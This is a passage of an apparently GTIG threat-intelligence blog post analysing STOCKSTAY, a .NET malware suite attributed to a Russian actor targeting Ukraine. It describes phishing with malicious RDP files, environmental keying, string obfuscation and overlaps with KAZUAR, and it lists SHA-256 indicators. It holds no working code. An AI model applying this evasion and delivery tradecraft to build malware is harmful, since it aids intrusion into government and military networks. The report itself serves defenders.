&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table border="1px" cellpadding="16px" style="border-collapse: collapse; width: 100%;"&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th scope="col" style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: left;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Column&lt;/strong&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;th scope="col" style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: left;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Description&lt;/strong&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;id&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Primary key&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;data&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Log message&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;datetime&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Time of creation&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Table 4: &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;log&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; database table structure&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Key Operational Characteristics&lt;/span&gt;&lt;/h3&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Consistent Use of Academic or Diplomatic Lure Content&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The threat actor(s) involved in STOCKSTAY operations appear to have an affinity for integrating academia and diplomacy into their infrastructure and lure/decoy content, including:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;compromising an email account belonging to a Ukrainian university to disseminate phishing emails;&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;using the names of an academic institution within the file name of a malicious RDP file;&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;compromising a diplomatic education platform for phishing and distribution of malicious RDP files;&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;using “education” and “diplo” within registered phishing domains; and&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;using “DiplomacyEduAI” as the product name within STOCKSTAY MSI files.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Persistent Ukrainian Targeting&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;A significant proportion of STOCKSTAY operations observed by GTIG have been targeted at Government or Military organizations within Ukraine, consistent with Russian interests in relation to the ongoing conflict between the two countries. The threat actor has been observed utilizing in-country compromised infrastructure, including compromised government services, to deploy both STOCKSTAY and a range of supplementary payloads, in support of these operations. &lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Suspected European Targeting&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;A smaller number of STOCKSTAY operations observed by GTIG appear to have been targeted at European entities. Early development samples of STOCKSTAY were identified in various European nations, including Italy, the Netherlands, Poland, and Germany; however, we have been largely unable to confirm the intended victims for the majority of these early infections, nor whether these samples were identified as a result of the threat actor testing their capabilities against publicly available virus scanning services such as VirusTotal. GTIG was able to identify, in at least one case, the targeting of entities associated with, or interested in, a foreign affairs ministry in Europe in relation to phishing and suspected STOCKSTAY activity. &lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Deployment via Malicious RDP Files&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;GTIG observed STOCKSTAY being deployed following successful phishing attempts using malicious RDP configuration files. The RDP files were designed to create a connection from the victim’s device to actor-controlled infrastructure, through which the actor could then deploy subsequent payloads.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In one operation in early 2025, GTIG identified a phishing email, claiming to be sent by a defense-related training academy, containing a malicious RDP file attachment. A short time following the victim’s connection to the actor’s infrastructure, the actor deployed STOCKSTAY.MARKETMAKER, a .NET downloader designed to retrieve and install the full STOCKSTAY suite on the victim’s device. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Later, in mid-2025, GTIG identified similar malicious RDP files being hosted on a compromised diplomatic-themed education platform, luring victims into downloading and executing the file under the guise of enabling access to an online training portal. GTIG was unable to confirm whether STOCKSTAY was ultimately deployed as a result of this operation; however, overlaps in the actor’s infrastructure and education-themed lures for both operations may suggest STOCKSTAY was the intended payload. &lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Deployments at Multiple Stages of Operations&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Through GTIG’s visibility, we have identified that the threat actor uses STOCKSTAY at multiple distinct stages of their operations. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In the first instance, the threat actor uses STOCKSTAY during operations to gain initial access into environments which haven’t yet been subject to the group’s reconnaissance activities. In these instances, STOCKSTAY is configured with hard-coded configuration passwords, which can be trivially extracted by analysts. We observed this type of infection stemming from the group’s phishing operations, where the threat actor is unable to determine exactly where in the victim’s network they are going to gain their initial foothold.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;When the threat actor deploys STOCKSTAY at a later stage of operation, following reconnaissance, STOCKSTAY is configured to incorporate environmental keying for its configuration, requiring the malware to be executed either on a specific host, by a specific user, within a specific domain, or a pre-determined combination of the these attributes. This configuration implies that, at this stage, the actor knows exactly which machine is being targeted, likely through existing accesses to the target environment. This was seen within Ukrainian networks where STOCKSTAY was deployed toward the end of an operation which had previously relied heavily on the group’s other tools, such as KAZUAR. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Overlaps with KAZUAR&lt;/span&gt;&lt;/h3&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;K1MORPHER String Obfuscation&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In April 2025, GTIG observed STOCKSTAY being updated to implement a new string obfuscation mechanism, based around an obscure pseudo-random number generation algorithm named “Squirrel3”, which was &lt;/span&gt;&lt;a href="https://www.gdcvault.com/play/1024365/Math-for-Game-Programmers-Noise" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;presented&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; at Game Developers Conference 2017. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;GTIG later identified versions of STOCKSTAY containing some of their original class-names, which showed the code responsible for runtime string deobfuscation being contained within a class named “K1.Morpher”. Analysis of K1MORPHER shows the ability to perform runtime deobfuscation of a range of datatypes, such as strings, integers, and arrays. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In June 2025 GTIG noticed K1MORPHER code appearing in samples of KAZUAR. KAZUAR has historically used its own simple but effective code and string obfuscation techniques to evade detection, such as: the insertion of junk code; replacing static constant values with the results of XOR operations; and large quantities of unique character substitution tables. The actor’s use of K1MORPHER within STOCKSTAY appears to be trending toward mimicking KAZUAR’s multi-class obfuscation techniques, where obfuscation is handled by multiple distinct classes, as observed in suspected test builds of STOCKSTAY hosted on a compromised Cypriot website in April 2024.&lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Implant Architecture&lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt; &lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Since at least 2024, KAZUAR has been observed being deployed using a multi-component architecture, whereby C2 communication, task orchestration, and task execution are managed by separate components. Within the KAZUAR ecosystem, these components are referred to as “BRIDGE”, “KERNEL”, and “WORKER”, respectively.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;As of late 2023, GTIG identified a similar separation of responsibilities within the STOCKSTAY ecosystem, with the same responsibilities being separated into distinct components. C2 communication is managed by the component tracked by GTIG as STOCKSTAY.STOCKBROKER, while task orchestration and execution are handled by STOCKSTAY.STOCKMARKET and STOCKSTAY.STOCKTRADER, respectively.&lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Environmental Keying&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Both KAZUAR and STOCKSTAY ecosystems have been observed using environmental keying to protect themselves from detection and analysis.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;DIAMONDBACK, a dropper often deployed prior to KAZUAR in the execution chain, has made use of a hash of the target’s hostname in decrypting its payload, to prevent divulgence of its intentions outside of the target environment. Later versions of DIAMONDBACK can be configured to incorporate the target’s username and domain name in the hash required to decrypt the payload.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY has been observed using the hash of the target’s hostname or domain name during the decryption of its configuration data, preventing disclosure of C2 infrastructure unless operating in the intended environment.&lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Summary of Overlaps&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;GTIG assesses with moderate confidence that STOCKSTAY and KAZUAR may be developed in-part by a common developer or team, with active development occurring in tandem between the two malware ecosystems. We believe that STOCKSTAY is being developed in KAZUAR’s image, with several design decisions likely spawning from the threat actor’s wealth of experience in conducting operations using this long-standing toolkit. Both ecosystems rely heavily on .NET development, and have been observed using compromised WordPress sites during various stages of their operations.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We assess with low confidence that our observations of STOCKSTAY being deployed alongside KAZUAR during active operations may be a result of the threat actor seeking to test new capabilities in active operations, particularly where they may be expecting their existing access to be remediated in the near future. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY Timeline&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;GTIG has conducted a thorough investigation into the history of STOCKSTAY, identifying suspected development activity as far back as December 2022. What follows is our assessment of the timeline of events surrounding STOCKSTAY’s development and deployment. To assist the wider community in hunting and identifying activity outlined in this blog post, we have included indicators of compromise (IOCs) within each observed operation section, and in a &lt;/span&gt;&lt;a href="https://www.virustotal.com/gui/collection/ed88a43801b5c58b9be27fa74abaa278a48904f3cc1bc905f2d85e32448b96c5/iocs" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;GTI Collection&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; for registered users.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="Timeline of STOCKSTAY observations" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/stockstay-fig5.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Figure 5: Timeline of STOCKSTAY observations&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;December 2022&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The version of the open-source websocket-sharp.dll bundled with the majority of observed STOCKSTAY.STOCKBROKER samples was last modified, according to timestamp information in MSI files and ZIP archives containing STOCKSTAY. Although built from an open-source library, this specific instance appears to have been compiled by the actor themselves, thus creating a uniquely identifiable artifact with which to track this malware’s continuous development.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: left;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Filename&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: left;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Description&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: left;"&gt;&lt;strong style="vertical-align: baseline;"&gt;SHA-256&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;websocket-sharp.dll&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Instance of open-source library used by the threat actor&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;d1e54270433a94aa3d45d888e4c62299bee3480eb2cb4a5489c7dda69d476c3e&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Table 5: File indicators&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;September 21, 2023: Germany&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;An early version of STOCKSTAY was uploaded to VirusTotal from Germany, under the filename “DriversPrinterGraphic.rar”. From the archive’s timestamps, it appears as though the sample was submitted within 20 minutes of being created, likely indicating this was submitted by the malware’s developer.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This version predates the malware’s separation into distinct role-based components, instead incorporating all core functionality into a single executable: StockMarketNews.exe. Additionally, this version of STOCKSTAY contained the user interface shown in Figure 6, which enables viewing/editing of configuration options and command messages, while still presenting as a stock market utility.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="Early STOCKSTAY user-interface" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/stockstay-fig6.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Figure 6: Early STOCKSTAY user-interface&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This particular STOCKSTAY sample uses a slightly different configuration file format; however, the underlying configuration options are consistent with later versions. This sample also utilizes environmental keying for its configuration file; using the lower-cased hostname of the intended target as the decryption password. GTIG has been unable to recover the password at this time.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: left;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Filename&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: left;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Description&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: left;"&gt;&lt;strong style="vertical-align: baseline;"&gt;SHA-256&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;DriversPrinterGraphic.rar&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;RAR archive containing STOCKSTAY&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;e6d8192960a89d5480868b94088cccdaa1560f9c8a0b0282ced2b7c1f72341b6&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;StockMarketNews.exe&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY combined executable&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;1fc23ec18a94a599a34c74ef5f49a1e27acd37a07d5846661702b5e7e81a6a24&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;sample.conf&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY configuration file&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;1a2ca8b8e0344fe3d80da7352206a470245443e2349a237bc093df934ddc011f&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Table 6: File indicators&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;December 5 – 6, 2023: Netherlands&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;A further RAR archive containing STOCKSTAY was submitted to VirusTotal at 2023-12-06 08:52:49 from the Netherlands, under the filename “apps_libwallets_v1.3.rar”. This archive was last modified the previous day at 2023-12-05 16:47:42. This pattern may indicate that the archive was created by the individual at the end of their working day, and then submitted the following day when they returned to the office.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This instance of STOCKSTAY was the first case observed by GTIG of the malware’s core functionality being separated into distinct role-based components, using the filenames shown in Table 7.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
